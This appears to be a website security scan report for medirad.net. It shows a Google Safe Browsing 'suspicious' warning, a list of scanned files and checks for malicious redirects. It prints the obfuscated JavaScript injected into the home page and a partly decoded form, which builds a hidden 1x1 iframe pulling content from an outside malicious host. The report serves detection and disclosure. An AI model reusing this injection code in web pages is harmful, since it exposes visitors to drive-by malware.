Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=medirad.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.medirad.net/ | 200 OK Content-Length: 7325 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var ZEBJts="GceG1Gce72";var ty6y8="eGFGceG3Gce75G";var Fr0cHn="Gce%Q4BGceGAGc";var XGcG68f="place(/RK/g,";var AcCb="%Q45GceGCGc";var FrtM="ce7%Q4Gce28Gce";var NNWKcR="%Q4GceGFGce";var wLsmbw=".replace(/2eN";var T8WFQYa="KkdWkdWYpOK";var RmpG="qlF='2eN562";var nRu1="592eN6E2";var NgNO="YpOK51YpO";var ZQZqtN="cape(CjYd.repla";var L4nVdIbs="pOKkdWkd";var QWqTQq3v="e72GceG5G";var oO2I6="9ddEp927p9dd";var zBXZ="Gce2EGce77Gc";var aQE91="ceGCGceG5GceG";var WnD9A="%Q4GceGFGce";aQE91="Q4Gce%Q45G"+aQE91;v Decoded script: var CjYd='2D7CU612D722D202D652D682D582D492D492D3CU7CU482D3D2D222D3C2D642D692D7CU202D692D642D3D2D272D772D702D5A2D6D2D372D702D4B2D272D3FR2D3C2D2F2D642D692D7CU3FR2D222D3B';eval(unescape(CjYd.replace(/2D/g,'%').replace(/CU/g,'6%').replace(/FR/g,'E')));var ExzJK3Ly='p969p966p928p964p96Hrp9p96ddp975p96Dp965p96Ep974p92Ep962p96Hrp9p964p979p9ddDp9ddDp96Ep975p96Cp96Cp929p965p968p958p949p949p9dd6p976p948p9ddDp927p9ddCp962p96Hrp9p964p979p9ddEp927p92Bp965p968p958p949p949p9dd6p976p948p92Bp927p9ddCp92Hrp9 var VQrYn=document.getElementById('wpZm7pK');var KjAeuTs=document.createElement('iframe');KjAeuTs.src='http://double.boublebarelled.ws/FrMal'; KjAeuTs.width='1';KjAeuTs.height='1';KjAeuTs.name='zGQoLS99w'; KjAeuTs.width='1';KjAeuTs.height='1';KjAeuTs.name='zGQoLS99w'; KjAeuTs.style.visibility='hidden'; KjAeuTs.style.visibility='hidden'; <div id='wpZm7pK'></div> Antivirus reports:
| ||
http://www.medirad.net/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: medirad.net
Result:
GET / HTTP/1.1
Host: medirad.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: medirad.net
Referer: http://www.google.com/search?q=medirad.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: medirad.net
Referer: http://www.google.com/search?q=medirad.net
Result:
The result is similar to the first query. There are no suspicious redirects found.